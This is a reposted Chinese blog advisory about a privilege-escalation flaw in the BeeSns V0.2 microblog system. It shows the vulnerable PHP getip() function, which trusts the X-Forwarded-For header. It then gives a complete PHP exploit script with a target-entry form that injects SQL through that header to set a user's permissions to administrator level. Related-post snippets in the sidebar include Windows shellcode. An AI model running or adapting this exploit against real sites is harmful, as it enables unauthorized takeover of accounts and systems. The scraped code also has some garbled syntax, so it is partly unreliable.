BeeSns微博系统V0.2提升权限oday+exp

最新推荐文章于 2021-05-16 08:20:59 发布
最新推荐文章于 2021-05-16 08:20:59 发布
阅读量902 收藏
点赞数
分类专栏: ccbz^漏洞整理 文章标签: input server permissions path fp cmd

发布日期:2011-1.27
发布作者:子仪
影响版本:BeeSns V0.2
官方地址: http://www.beesns.com/
漏洞描述:IP过滤不严,导致用户可以提交恶意参数提升自身权限 

这套微博系统风格挺不错的,个人比较喜欢,看代码是发现一些问题,直接看代码吧 

01// 获取客户端IP
02functiongetip() {
03 if(isset($_SERVER)) {
04  if(isset($_SERVER[HTTP_X_FORWARDED_FOR])) {
05   $realip= $_SERVER[HTTP_X_FORWARDED_FOR];
06  } elseif(isset($_SERVER[HTTP_CLIENT_IP])) {
07   $realip= $_SERVER[HTTP_CLIENT_IP];
08  } else{
09   $realip= $_SERVER[REMOTE_ADDR];
10  }
11 } else{
12  if(getenv("HTTP_X_FORWARDED_FOR")) {
13   $realip= getenv( "HTTP_X_FORWARDED_FOR");
14  } elseif(getenv("HTTP_CLIENT_IP")) {
15   $realip= getenv("HTTP_CLIENT_IP");
16  } else{
17   $realip= getenv("REMOTE_ADDR");
18  }
19 }
20 $iphide=explode(".",$realip);
21   
22 $realip="$iphide[0].$iphide[1].$iphide[2].$iphide[3]";//!我不明白作者写的神马东西,IP没过滤,漏洞产生
23 return$realip;
24}

老掉牙的漏洞了,纯属YY。 - -!

EXP: 

01<?php
02print_r('
03+---------------------------------------------------------------------------+<br>
04BeeSns v0.2 Getip() Remote SQL Injection Exploit<br>
05site:www.beesns.com  <br>
06by 子仪<br>
07Blog: http://www.zyday.com  <br>
08               
09+---------------------------------------------------------------------------+<br>');
10  
11if(empty($_POST[submit])) {
12}else{
13 error_reporting(7);
14 ini_set('max_execution_time', 0);
15 $host= $_POST[host];
16 $path= $_POST[path];
17 $username$_POST[username];
18 $password$_POST[password];
19 send();
20
21<!--more-->
22  
23functionsend()
24{
25    global$host, $path,$username,$password
26  
27    $cmd= "uId=".$username."&uPw=".$password;
28    $getinj="1.1.1.1',permissions=5 where uid='$username'#";
29    $data= "POST ".$path."post.php?act=userLogin HTTP/1.1/r/n";
30    $data.= "Accept: */*/r/n";
31    $data.= "Accept-Language: zh-cn/r/n";
32    $data.= "Content-Type: application/x-www-form-urlencoded/r/n";
33    $data.= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)/r/n";
34    $data.= "Host: $host/r/n";
35    $data.= "Content-Length: ".strlen($cmd)."/r/n";
36    $data.= "Connection: Close/r/n";
37    $data.= "X-Forwarded-For: $getinj/r/n/r/n";
38    $data.= $cmd
39  
40    $fp= fsockopen($host, 80);
41    fputs($fp, $data); 
42  
43    $resp= ''
44  
45    while($fp&& !feof($fp))
46        $resp.= fread($fp, 1024); 
47  
48 if(preg_match('#(.*)charset=utf-8(.*)1(.*)1(.*)0(.*)#Uis',$resp)){
49  echo"<br><font color='green'>提升权限成功!</font>";
50 }else{
51  echo"<font color='red'>Failed!</font>";
52 }
53    
54}
55?>
56<form action=''method='POST'>
57目标地址:<input type='input'name='host'value='www.zyday.com'>*请勿加<a href="http://%3cbr/">http://<br</a>>
58二级目录:<input type='input'name='path'value='/'>*如果不是二级目录,请保持默认<br>
59用户名:<input type='input'name='username'>*您在目标站申请的用户名,<font color='red'>建议用小号测试</font><br>
60密码:<input type='input'name='password'><br>
61<input type='submit'name='submit'value='提升权限'><br>
62</form>
hkccbz
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用 0DAY 漏洞 CVE-2018-8174 获取windows系统 shell
Cwillchris的博客
05-27 681
一、 利用 0DAY 漏洞 CVE-2018-8174 获取windows系统 shell 实验环境: kali攻击机(192.168.98.30) window目标机(192.168.98.35) CVE-2018-8174脚本 实验步骤: 1、xshell上传 CVE-2018-8174 的 EXP 到 Kali 2、解压 CVE-2018-8174 并进入该目录 3、利用EXP生成恶意html文件,并放到/var/www/html,为了让目标机访问 python2
beesns开源微博
10-15
BeeSns是一种迷你型信息记录传播收集工具,是一种可以即时发布消息的类似博客的系统,可以通过手机、IM软件(gtalk、MSN、QQ、skype)和外部API接口等途径向你的粉丝传递消息,并且同类信息可以分类聚合。
oday获取系统最高权限的代码
weixin_30394669的博客
03-30 96
import sys,sockettarget = sys.argv[1]shellcode = ("\x6a\x4f\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfe\x1f" "\xf6\x02\x83\xeb\xfc\xe2\xf4\x02\xf7\x7f\x02\xfe\x1f\x96\x8b" "\x1b\x2e\...
phpaaCMS V0.3 存在注射oday漏洞 (图)
caiguazheng4921的博客
04-19 215
偶然路过一个php的站,由于自己很少对PHP有研究所以马虎的看了看是phpaaCMS ,不是大型的CMS,习惯性的在后面加了个“'”,没想到爆错了! You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the righ...
phpaaCMS V0.3 存在注射oday漏洞
weixin_33892359的博客
11-27 309
偶然路过一个php的站,由于自己很少对PHP有研究所以马虎的看了看是phpaaCMS ,不是大型的CMS,习惯性的在后面加了个“'”,没想到爆错了! You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version fo...
一次Oday提权批量拿取商城服务器root权限
weixin_34396103的博客
05-24 458
此问题影响范围巨大,涉及到所有通过niushop开发的商城,希望通过这篇文章能够引起大家的重视。(注:演示的所用商城已经修复了此漏洞) 严重性:特级 解决方案:1.在用户访问漏洞页时对其身份进行判断;2.对上传的文件后缀名进行校验。 5月19日参加完公司举办的运动会,回到家中一直比较兴奋,快凌晨1点了还睡不着,于是打开笔记本来试试之前看到...
C#+SQL Server工资管理系统
热门推荐
xueba8的博客
07-03 1万+
一、 设计目的结合数据库原理的基本理论,选用一种现代关系数据库系统(如:SQL SERVER),设计一个具体的信息管理系统。通过本课程的训练,使学生掌握数据库技术的实际应用以及数据库信息管理系统的设计方法与开发过程;掌握数据库开发工具的使用以及综合编程调试的能力,为以后能进行数据库系统设计、开发与维护打下良好的基础。 二、 设计要求结合一个具体任务(见附件一:综合设计参考题目),完成一个数据库系统...
sql注入系统命令 linux,SiteServer 3.4.4最新SQL注入0day
weixin_36134015的博客
05-16 205
这几天在看一个站的时候发现了这个CMS,网上公布了一些漏洞,没说明具体版本,但在我在3.4.4上实际测试的时候发现是无效的,为此专门去官网下了一份最新版,看了一下,发现了一些很搞笑的问题。简介siteserver:本文测试的版本是:SiteServer系列产品最新版本: 3.4.4 正式版 (2011年7月18日发布)下载地址:http://www.siteserver.cn/download客户...
服务器系统探测/识别、容器判断怎么做
LuHai3005151872的博客
07-30 952
黑客将要入侵检测一个网站的时候往往会通过踩点判断网站的一些信息!比如网站是使用的什么网站程序这种程序的具体版本,这种版本是否存在什么oday漏洞等,还有网站是使用什么脚本语言编写的,查找网站的后台地址,管理员的一些信息,等等。最重要的就是判断网站服务器 的是否是虚拟主机或者是独立主机还是独立服务器、服务器的操作系统等等。 当黑客了解了这些信息才能使用具体的方法进行入侵检测.设想一些假如黑客需要入侵网站后进一步获得网站的服务器管理权限来进行挂扣扣挖矿或者一些其他的用途。 那么黑客就需要考虑以下情况。 1.黑
ECSHOP最新ODAY EXP工具
05-10
对中文ECSHOP可以支持13年以前的所有版本。如果更新的就没有办法。
千博企业网站管理系统 Oday
04-16
千博企业网站管理系统 Oday入侵 千博企业网站管理安全检测
oday安全:软件漏洞分析技术第五章堆溢出.zip
05-20
oday安全:软件漏洞分析技术》第五章的例子,包括源C代码、源程序、IDA数据库文件等,有兴趣的同学调试看看
oday
03-14
oday
oday安全:软件漏洞分析技术GS_0.zip
03-31
oday安全:软件漏洞分析技术第10章第一个实验。有兴趣的小伙伴尝试一下。
<Oday安全 12.3.1Ret2Libc实战之利用ZwSetInformationProcess>一节补充
lixiangminghate的专栏
03-08 892
本文补充记录我在试验关闭DEP过程遇到的问题和解决方法。     首先要说一下用OllyFindAddr插件寻找目标指令时可能会遇到的问题。诚然这个插件是个好东西,能迅速列出需要的指令流的地址,但并不是所有在列的指令地址都可以使用,挑选前需要甄别。以关闭DEP保护流程中抬高esp值"Find Pop Retn+n"为例: 插件罗列了一堆备选指令地址,我挑选最后一个地址"0x7D97FE
毕设项目:基于J2ME的手机游戏开发(JAVA+文档+源代码)
最新发布
06-27
第一章 绪论 1 1.1 研究背景 1 1.2 研究内容 1 第二章 J2ME及其体系结构概述 2 2.1 J2ME简介 2 2.2 J2ME 体系结构 2 2.3 移动信息设备简表概述 3 2.3.1 MIDP的目标硬件环境 3 2.3.2 MIDP应用程序 3 2.3.3 CLDC和MIDP库中的类 3 2.4 J2ME API简介 4 2.4.1 MIDP API概述 4 2.4.2 MIDlet应用程序 4 2.4.3 使用定时器 5 2.4.4 网络 6 2.4.5 使用Connector 7 2.4.6 使用HttpConnection 8 2.4.7 永久性数据(RMS) 9 2.4.8 存储集(Record Store) 10 2.4.9 记录 11 2.4.10 枚举 12 2.4.11 异常 13 2.5 用户界面(LCDUI 13 2.5.1 UI基础 13 2.5.2 高级UI 14 2.5.3 低级UI 15 第三章 手机游戏开发过程 16 3.1 贪吃蛇游戏的规则简介以及开发环境 16 3.1.1 贪吃蛇游戏的规则简介 16 3.1.2 开
软件工程编译原理作业过程详细
06-27
词法分析,递归下降语法分析,LR语法分析,目标代码生成等
jdk-8u321-windows-x64.exe
06-27
jdk-8u321-windows-x64.exe
public class Date { private int year, month, day; public void Date(int y,int m,int d) { //定义有参构造方法 year=y; month=m; day=d; } public Date(){ //定义无参构造方法 Date(2018,6,15); } public void setMonth(int month) {//给成员变量month赋值 month=month; } public int getMonth(){ returm month; } public void print(){ System.out.println("date is "+ this.year+"-"+this.month+"-"+this.day); } public void main(String args[]){ Date oday = new Date(2018,7); print(); } } 找出7处错误
06-01
7. 在 `main` 方法中,应该使用 `oday` 对象调用 `print` 方法,因此应该将 `print()` 改为 `oday.print()`。 修改后的代码如下: ``` public class Date { private int year, month, day; public Date(int y,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值